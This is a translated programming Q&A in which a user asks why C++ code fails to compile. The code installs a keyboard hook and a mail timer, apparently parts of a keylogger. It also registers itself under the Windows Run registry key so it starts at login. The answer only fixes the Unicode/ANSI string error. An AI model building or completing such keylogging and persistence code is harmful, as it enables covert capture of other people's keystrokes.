我遇到一些c ++代码问题。
更确切地说,我想要在Windows启动时运行的程序为自动启动注册一个注册表项。
其余代码放在另一个标题中,我认为你们不需要它。
#include <iostream>
#include <windows.h>
#include "KeybHook.h"
using namespace std;
int main ()
{
MSG Msg;
IO::MkDir (IO::GetOurPath (true));
InstalHook ();
while (GetMessage (&Msg, NULL, 0, 0))
{
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
MailTimer.Stop ();
std::wstring progPath = L"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\MyApp.exe";
HKEY hkey = NULL;
LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey); //Creates a key
LONG status = RegSetValueEx(hkey, L"MyApp", 0, REG_SZ, (BYTE *)progPath.c_str(), (progPath.size()+1) * sizeof(wchar_t));
return 0;
}
我在编译时遇到此错误
main.cpp||In function 'int main()':|
main.cpp|35|error: cannot convert 'const wchar_t*' to 'LPCSTR {aka const char*}' for argument '2' to 'LONG RegCreateKeyA(HKEY, LPCSTR, PHKEY)'|
main.cpp|36|error: cannot convert 'const wchar_t*' to 'LPCSTR {aka const char*}' for argument '2' to 'LONG RegSetValueExA(HKEY, LPCSTR, DWORD, DWORD, const BYTE*, DWORD)'|
||=== Build failed: 2 error(s), 8 warning(s) (0 minute(s), 1 second(s)) ===|
答案 0 :(得分:3)
您正在使用Windows API的ANSI版本,但您的字符串是Unicode。
您应该#define UNICODE
和#define _UNICODE
(您需要两者;一个用于Windows API,一个用于C运行时)。
如果您正在Visual Studio项目下构建,则可以通过在“常规/字符集”下的项目设置中启用“使用Unicode字符集”来定义那些而不编辑代码。